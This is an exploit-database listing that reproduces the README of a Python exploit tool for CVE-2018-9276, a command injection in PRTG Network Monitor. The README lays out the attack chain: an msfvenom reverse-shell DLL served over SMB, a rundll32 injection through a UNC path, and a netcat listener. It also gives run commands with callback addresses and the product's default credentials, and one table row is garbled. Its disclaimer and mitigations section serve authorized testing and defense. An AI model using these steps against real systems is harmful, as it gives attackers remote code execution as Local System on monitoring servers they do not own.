Exploit for OS Command Injection in Paessler Prtg_Network_Monitor CVE-2018-9276

Name: Exploit for OS Command Injection in Paessler Prtg_Network_Monitor CVE-2018-9276
Rating: 5 (2 reviews)
2026-06-13 | CVSS 9.0
## https://sploitus.com/exploit?id=17EC6402-3592-524E-855F-9BDAADA3BB88
# CVE-2018-9276 — PRTG Network Monitor  **⚠️ Disclaimer:** This tool is intended for educational purposes and authorized penetration testing only. Use it only against systems you own or have explicit written permission to test. Unauthorized use is illegal.

---

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [How It Works](#how-it-works)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Examples](#examples)
- [Mitigations](#mitigations)
- [References](#references)

---

## Overview

**PRTG Network Monitor** is a network monitoring tool developed by Paessler AG. Versions prior to **18.2.39** are vulnerable to an authenticated command injection via the notifications feature, allowing an attacker with valid credentials to achieve **Remote Code Execution (RCE)** as **Local System** (the default service account for PRTG installations).

This vulnerability was discovered during a penetration test by Josh Berry and disclosed to Paessler AG, who released a patch on **April 20, 2018**. It was assigned **CVE-2018-9276**.

---

## Vulnerability Details

| Field       | Value                                      |
|-------------|--------------------------------------------|
| CVE         | CVE-2018-9276                              |
| Affected    | PRTG Network Monitor  **Note:** The batch script (`OutFile.bat`) is **not** vulnerable — Paessler appears to sanitize input before passing it to the batch file. The injection only works via the `.ps1` script.

### Exploit Flow

The exploit automates the following steps:

```
1. Check server version → confirm target is vulnerable
2. Authenticate → obtain a valid session cookie
3. Stage a file notification → initialise a writable output file on the target
4. Trigger the file notification → execute it via /api/notificationtest.htm
5. Generate a reverse shell DLL → msfvenom (windows/shell_reverse_tcp)
6. Host the DLL → serve it over SMB from the attacker machine
7. Stage a command notification → inject rundll32.exe ,0 after the output file
8. Trigger the command notification → execute the DLL on the target
9. Catch the reverse shell → nc -nvlp 
```

### Why rundll32 + SMB?

PRTG only allows scripts located in its installation directory to run as notifications, so we cannot simply upload and execute an arbitrary binary. Instead, we:

1. Use `msfvenom` to generate a Windows reverse shell as a `.dll` file.
2. Host that `.dll` on an SMB share on the attacker machine.
3. Inject a `rundll32.exe \\attacker\share\payload.dll,0` command via the PowerShell notification parameter.

`rundll32.exe` can load and execute a DLL from a UNC path, bypassing the restriction on which files PRTG can directly execute.

---

## Requirements

- Python 3.8+
- `msfvenom` (part of Metasploit Framework)
- `netcat` (`nc`)
- `impacket` — only needed for the built-in SMB server (optional, see `--no-smb`)

```bash
pip install impacket
```

> If you already have a way to host the DLL (e.g. `impacket-smbserver`, Metasploit's `exploit/multi/handler`, or another SMB server), you can skip impacket entirely using `--no-smb` and `--shell-location`.

---

## Installation

```bash
git clone https://github.com//cve_2018_9276.git
cd cve_2018_9276
pip install -r requirements.txt   # only impacket
```

---

## Usage

```
usage: cve_2018_9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
                        [--user USER] [--password PASSWORD] [--https]
                        [--no-smb] [--shell-location SHELL_LOCATION] [-v]

options:
  -i, --host            Target IP or hostname
  -p, --port            Target port (e.g. 80 or 443)
  --lhost               Local IP for the reverse shell callback
  --lport               Local port for the reverse shell callback
  --user                PRTG username (default: prtgadmin)
  --password            PRTG password (default: prtgadmin)
  --https               Use HTTPS (self-signed certificates accepted)
  --no-smb              Skip the built-in SMB server (payload already hosted)
  --shell-location      Override the UNC path to the DLL payload
  -v, --verbose         Enable verbose / debug output
```

---

## Examples

### Basic usage (HTTP, default credentials)

```bash
python3 cve_2018_9276.py \
  -i 10.10.10.10 \
  -p 80 \
  --lhost 10.10.14.5 \
  --lport 4444
```

### HTTPS target with custom credentials

```bash
python3 cve_2018_9276.py \
  -i 10.10.10.10 \
  -p 443 \
  --lhost 10.10.14.5 \
  --lport 4444 \
  --user admin \
  --password Sup3rS3cr3t \
  --https
```

### Skip the built-in SMB server (payload hosted externally)

```bash
# Host the payload yourself first:
impacket-smbserver share /tmp -smb2support

# Then run the exploit pointing to your share:
python3 cve_2018_9276.py \
  -i 10.10.10.10 \
  -p 80 \
  --lhost 10.10.14.5 \
  --lport 4444 \
  --no-smb \
  --shell-location '\\10.10.14.5\share\payload.dll'
```

---

## Mitigations

- **Update PRTG** to version 18.2.39 or later — this is the only complete fix.
- **Change default credentials** — the vulnerability requires authentication; weak or default credentials (`prtgadmin / prtgadmin`) dramatically lower the barrier to exploitation.
- **Restrict network access** to the PRTG web interface (firewall rules, VPN, etc.).
- **Monitor PRTG logs** for unexpected notification test executions.

---

## References

- [Original Discovery — CodeWatch (Josh Berry)](https://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/)
- [NVD — CVE-2018-9276](https://nvd.nist.gov/vuln/detail/CVE-2018-9276)
- [Paessler AG Patch History](https://www.paessler.com/prtg/history/stable)
- [Original PoC by wildkindcc](https://github.com/wildkindcc/CVE-2018-9276)